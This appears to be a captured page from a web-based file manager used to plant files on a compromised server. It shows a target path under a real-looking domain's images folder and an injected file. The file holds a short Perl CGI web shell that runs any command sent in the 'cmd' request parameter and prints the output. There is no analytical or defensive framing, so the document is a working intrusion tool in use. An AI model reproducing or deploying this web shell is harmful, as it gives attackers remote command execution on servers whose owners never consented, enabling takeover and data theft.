File Manager V1.5

[SYSTEM@ROOT]: /home/risesoft/mrbeagle.risesoft.com.br/images/r10tapi/
INJECT_FILE:
NEW_ENTRY:

FILE_CONTENT: r10tperl.rx

#!/usr/bin/perl
use strict;
use warnings;
use CGI qw(:standard);
print header('text/plain; charset=utf-8');
my $q = CGI->new;
my $cmd = $q->param('cmd') || '';
if ($cmd) { $cmd =~ s/[\r\n]//g; print qx($cmd 2>&1); }
[ KEMBALI ]